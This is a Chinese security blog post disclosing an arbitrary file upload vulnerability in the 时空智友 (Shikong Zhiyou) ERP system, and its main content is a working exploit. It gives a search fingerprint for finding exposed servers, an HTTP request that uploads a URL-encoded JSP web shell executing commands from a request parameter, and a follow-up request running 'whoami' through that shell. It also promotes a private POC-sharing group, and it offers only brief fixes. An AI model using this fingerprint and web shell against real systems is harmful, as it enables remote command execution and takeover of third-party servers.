当前位置: 首页 > news >正文

做网站有软件吗郑州seo方案

news 2025/8/9 0:13:55
做网站有软件吗,郑州seo方案,网站设计风格,网站设计评价标准0x01 产品简介 时空智友ERP是一款基于云计算和大数据技术的企业资源计划管理系统。该系统旨在帮助企业实现数字化转型,提高运营效率、降低成本、增强决策能力和竞争力,时空智友ERP系统涵盖了企业的各个业务领域,包括财务管理、供应链管理、生…

0x01 产品简介

时空智友ERP是一款基于云计算和大数据技术的企业资源计划管理系统。该系统旨在帮助企业实现数字化转型,提高运营效率、降低成本、增强决策能力和竞争力,时空智友ERP系统涵盖了企业的各个业务领域,包括财务管理、供应链管理、生产计划、库存管理、人力资源管理、客户关系管理等。该系统具有强大的数据分析和报表功能,能够为企业提供实时的数据洞察和业务智能,帮助企业更好地应对市场变化和竞争压力。

0x02 漏洞概述

时空智友ERP系统/formservice?service=updater.uploadStudioFile接口存在任意文件上传,攻击者可上传任意文件到服务器上,包括木马后门文件,导致服务器权限被控制。

0x03 搜索引擎

body="login.jsp?login=null"

在这里插入图片描述

0x04 漏洞复现

POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 1098
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closecontent=<?xml%20version="1.0"?><root><filename>ceshi.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%22%29%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%69%6e%74%20%61%20%3d%20%2d%31%3b%62%79%74%65%5b%5d%20%62%20%3d%20%6e%65%77%20%62%79%74%65%5b%32%30%34%38%5d%3b%6f%75%74%2e%70%72%69%6e%74%28%22%3c%70%72%65%3e%22%29%3b%77%68%69%6c%65%28%28%61%3d%69%6e%2e%72%65%61%64%28%62%29%29%21%3d%2d%31%29%7b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%53%74%72%69%6e%67%28%62%2c%30%2c%61%29%29%3b%7d%6f%75%74%2e%70%72%69%6e%74%28%22%3c%2f%70%72%65%3e%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%25%3e-->

在这里插入图片描述

POST /update/temp/studio/ceshi.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closec=whoami

在这里插入图片描述

0x05 POC脚本获取

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、限制访问来源地址,如非必要,不要将系统开放在互联网上;
2、文件类型白名单:仅允许上传预先批准的文件类型,并拒绝所有其他文件;
3、定期安全更新:及时应用安全更新和补丁,以修复任何已发现的漏洞。

http://www.tj-hxxt.cn/news/96419.html

相关文章:

  • 做策划的都上哪些网站搜索资料间电子商务与网络营销教案
  • 如何给别人做网站挣钱搜索引擎快速排名推广
  • 网站空间付款方式搜索引擎优化的名词解释
  • 视频网站后台管理系统网站设计软件
  • wordpress nofollow标签百度seo点击软件
  • 网站宽屏图片怎么做手机端怎么刷排名
  • 网站服务器 要求互联网营销师考证多少钱
  • 怎么查看网站谁做的百度推广代理商名单
  • 网站开发电脑配置网站建设是干嘛的
  • 自适应网站一般做几个尺寸seo外包优化服务商
  • 物流网站建设方案网络营销步骤
  • 上海网站外包沈阳seo排名外包
  • 学校网站开发建设合同网站建设的公司
  • 先搭建网站还是先做ui长沙百度首页优化排名
  • 海外自建站个人免费网站建设
  • 电子科技 深圳 网站建设诊断网站seo现状的方法
  • 做网站熊掌号网页关键词优化软件
  • 自助建个人网站哪个好免费网站在线客服软件
  • 上海做网站待遇株洲网站建设
  • 网站名称重要吗百度竞价排名商业模式
  • 党委网站建设实施方案怎么做信息流广告代理商
  • 余杭区政府门户网站建设工程优化设计答案五年级上册
  • 合作建站协议怎么提高关键词搜索排名
  • 手机网站建设教程视频百度怎么搜索图片
  • 上海网站制作电话营销软件培训
  • 智能网站建设找三好科技2023新闻摘抄大全
  • 成化区建设局网站北京seo排名方法
  • 做网站有什么工具广州疫情防控措施
  • 逆袭做富豪官方网站googleseo排名公司
  • 重庆网站建设哪里有win10优化大师怎么样